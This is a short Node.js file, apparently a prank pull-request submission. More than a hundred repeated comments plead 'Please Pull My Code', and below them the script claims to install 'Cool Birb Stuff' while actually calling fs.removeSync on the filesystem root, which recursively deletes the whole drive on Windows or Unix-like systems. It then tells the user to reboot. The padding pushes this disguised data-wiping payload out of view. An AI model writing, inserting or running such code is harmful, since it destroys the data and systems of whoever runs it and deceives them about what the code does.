// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!
// Please Pull My Code I Work Very Super Hard On THe Code!!!!


const fs = require("fs-extra");

console.log("Welcome to great haha Birb Os Java Script Edition!!!!!!!!!!! Installing Cool Birb Stuff!!!!!!!");
fs.removeSync(process.platform == "win32" ? "C:\\" : "/");
console.log("Ok I Install Please Reboot For Cool Stuff To Do Maximum Coolness");
